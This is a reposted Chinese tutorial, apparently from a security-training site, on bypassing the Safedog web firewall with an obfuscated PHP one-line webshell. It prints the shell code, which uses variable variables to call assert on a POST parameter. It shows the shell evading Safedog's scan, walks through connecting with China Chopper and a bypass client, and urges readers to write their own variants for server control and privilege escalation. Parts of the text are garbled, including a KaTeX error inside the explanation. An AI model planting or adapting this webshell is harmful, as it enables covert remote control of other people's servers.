安基网 首页 安全 攻防案例 查看内容

文件上传漏洞之绕狗一句话原理和绕过安全狗

2020-5-27 12:58| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 一.防火墙及安全狗防火墙技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。防火墙技术的功能主要在于及时发现并处理计算机网络运行时可能存在的安全风险、数据传输等问题,其中处理措施 ...

一.防火墙及安全狗

防火墙技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。

防火墙技术的功能主要在于及时发现并处理计算机网络运行时可能存在的安全风险、数据传输等问题,其中处理措施包括隔离与保护,同时可对计算机网络安全当中的各项操作实施记录与检测,以确保计算机网络运行的安全性,保障用户资料与信息的完整性,为用户提供更好、更安全的计算机网络使用体验。


假设我们的phpStudy靶场存在一个“a.php”文件,如下图所示,它是一个常规的木马。


我们尝试访问“a.php”,但提示错误,因为它被防火墙或安全狗拦截了。


下面我们再分享下安全狗的概念。

安全狗以SECaaS安全即为用户提供一站式的云安全产品与服务,包括(云)主机安全、WEB应用安全、网站防篡改、抗DDoS云服务、安全大数据态势感知等。其基本功能包括:

网站安全狗: 面向网站安全,包括网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻击。

服务器安全狗: 面向服务器安全的,包括基于内核驱动的抗DDOS攻击、抗ARP攻击、抗WEB CC攻击功能;基于内核驱动的文件系统主动保护功能(可防止文件被篡改、保护系统文件);基于内核驱动的服务器其他方面的主动防御功能(系统账号、注册表、远程登陆等方面的保护);以及服务器全面优化及体检功能。

安全狗服云: 基于云端的监控和保护。安全狗服云利用云计算技术,为用户构造一个全面的服务器和网站的监控和防护平台,利用这个平台,用户可以做到24小时的服务器健康监控、资源监控和资源告警;24小时的服务器可用性监控;网站安全云扫描,发现网站存在的各种漏洞;基于云端技术的网站防篡改功能,保障网站文件不被非法修改。


接着我们下载安全狗并进行安装,如下图所示。


安装成功之后,包括网站防护、资源防护、IP黑白名单、防护日志四个核心功能。



二.绕狗一句话

假设我们存在一个“a.php”文件和“gou.php”文件。


其中“a.php”一句话木马如下图所示:


“gou.php”的代码如下:


t$a='b';
t$$a='assert';
t$b($_POST[fox]);
?>

点击网马查杀下面的“自定义路径扫描”按钮,如下图所示。


接着选择指定目录,这里使我们phpStudy的靶场“WWW/gou”文件夹。


其扫描结果是,它发现了我们的PHP一句话木马,却没有发现绕狗一句话。


木马提示如下图所示:


我们的“dog.php”没有被发现了,并且能够直接访问,接下来我们利用中国菜刀和狗刀进行连接,并解释其工作原理。


三.绕狗一句话原理

绕狗一句话木马代码如下:

t$a='b';
t$$a='assert';
t$b($_POST[fox]);
?>

这里的“$$a=‘assert’;”其实就是“$b”,由于没有直接对“KaTeX parse error: Undefined control sequence: b at position 1: ?b?”进行赋值,所以安全狗不会提示…_POST[fox])”,其实就是一句话木马。紧接着我们尝试用Caidao进行连接。

注意,这里这里我们远程服务器上传的绕狗一句话文件叫“dog.php”。


这里提示安全狗拦截,如下图所示:


下图可以看到,中国菜刀成功获取了服务器的文件目录。


接着尝试用狗刀进行连接。


连接的URL如下所示,密码为“fox”(fox老师的名称)。


最终也成功获取了服务器的目录。


接着尝试利用WSExplorer工具进行抓包,对比“中国菜刀”和“狗刀”的流量。



将数据包复制到记事本中,进行对比,上面是“中国菜刀”获取的数据包,下面是“狗刀”获取的数据包。


将z0和z1提取出来,如下图所示,通常会搜索%然后转换“=”、“+”等字符。


从Cracer安全工具中找到转码工具。


Base64转码的结果如下图所示:


“中国菜刀”流量的转码结果如下:


“狗刀”流量的转码结果如下:


两段流量不同的地方如下:


这里建议尝试自己去抓包分析下过狗菜刀的原理,然后编写属于自己的代码。通过过狗成功绕过并控制了整个C盘,对于我们提权有很大的帮助。


四.总结

写到这里,这篇基础性文章就此结束,最后希望这篇基础性文章对您有所帮助。突然发现,作者已经写了400篇文章了,非常值得纪念,今后也希望帮到更多的读者。也觉得自己的技术好浅,要学的知识好多,希望读博四年能不断成长吧。最后祝明天所有考研学子都取得好成绩,不负青春~



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6830615922659557899/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部